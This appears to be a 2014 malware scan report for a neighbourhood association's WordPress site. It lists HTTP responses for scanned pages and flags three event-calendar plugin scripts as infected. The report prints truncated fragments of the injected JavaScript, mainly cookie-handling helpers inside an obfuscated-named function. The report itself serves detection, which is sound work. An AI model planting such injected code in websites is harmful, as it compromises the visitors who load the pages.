Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ihpna.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ihpna.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 05:19:31 GMT Location: http://ihpna.net/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: HIT from Backend X-Pingback: http://ihpna.net/cms/xmlrpc.php | clean |
http://ihpna.net/ | 200 OK Content-Length: 15158 Content-Type: text/html | clean |
http://ihpna.net//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 05 Oct 2014 05:19:34 GMT Pragma: no-cache Location: http://ihpna.net/ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Cache: HIT from Backend X-Pingback: http://ihpna.net/cms/xmlrpc.php | clean |
http://ihpna.net/ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js/ | 404 Not Found Content-Length: 25244 Content-Type: text/html | clean |
http://ihpna.net/cms/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 404 Not Found Content-Length: 25244 Content-Type: text/html | clean |
http://ihpna.net/cms/wp-content/plugins/event-calendar/xmlhttprequest.js | 200 OK Content-Length: 9301 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Vuelingflytersku() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function Ursilifer(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = Ursilifer this.onerror(); } } }; }; } if (!window.ActiveXObject && window.XMLHttpRequest) { window.ActiveXObject = function(type) { switch (type.toLowerCase()) { case 'microsoft.xmlhttp': case 'msxml2.xmlhttp': case 'msxml2.xmlhttp.3.0': case 'msxml2.xmlhttp.4.0': case 'msxml2.xmlhttp.5.0': return new XMLHttpRequest(); } return null; }; } Antivirus reports:
| ||
http://ihpna.net/cms/wp-content/plugins/event-calendar/ec3.js | 200 OK Content-Length: 12749 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Vuelingflytersku() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function Ursilifer(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = Ursilifer var month= document.getElementById(month_xml.childNodes[0].getAttribute('id')); if(month) ec3_Popup.add_tbody( get_child_by_tag_name(month,'tbody') ); } } } ec3(); ec3.today=new Date(); ec3.today_day_num=ec3.today.getDate(); ec3.today_month_num=1+ec3.today.getMonth(); ec3.today_year_num=ec3.today.getFullYear(); ec3.reqs=new Array(); ec3.ELEMENT_NODE=1; ec3.TEXT_NODE=3; ec3.version='3.1.4'; Antivirus reports:
| ||
http://ihpna.net/cms/wp-content/plugins/event-calendar/popup.js | 200 OK Content-Length: 7026 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Vuelingflytersku() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function Ursilifer(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = Ursilifer } } else if (obj.x) curleft += obj.x; return curleft; } function findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while(1) { curtop += obj.offsetTop; if(!obj.offsetParent) break; obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop; } } ec3_Popup(); Antivirus reports:
| ||
http://ihpna.net/cms/wp-content/plugins/wp-cycle/jquery.cycle.all.min.js?ver=2.9999.5 | 200 OK Content-Length: 34515 Content-Type: application/javascript | clean |
http://ihpna.net/news/ | 200 OK Content-Length: 21298 Content-Type: text/html | clean |
http://ihpna.net/category/newsletters/ | 200 OK Content-Length: 15987 Content-Type: text/html | clean |
http://ihpna.net/category/ihpna-sponsored-events/ | 200 OK Content-Length: 15827 Content-Type: text/html | clean |
http://ihpna.net/history/ | 200 OK Content-Length: 19224 Content-Type: text/html | clean |
http://ihpna.net/island-home-city-park/ | 200 OK Content-Length: 23445 Content-Type: text/html | clean |
http://ihpna.net/category/homes-for-sale-rent/ | 200 OK Content-Length: 9950 Content-Type: text/html | clean |
http://ihpna.net/island-home-park-board-of-governors/ | 200 OK Content-Length: 11776 Content-Type: text/html | clean |
http://ihpna.net/category/ihpna-meeting-minutes/ | 200 OK Content-Length: 20766 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ihpna.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 05:19:33 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: HIT from Backend
X-Pingback: http://ihpna.net/cms/xmlrpc.php
GET / HTTP/1.1
Host: ihpna.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 05:19:33 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: HIT from Backend
X-Pingback: http://ihpna.net/cms/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: ihpna.net
Referer: http://www.google.com/search?q=ihpna.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ihpna.net
Referer: http://www.google.com/search?q=ihpna.net
Result:
The result is similar to the first query. There are no suspicious redirects found.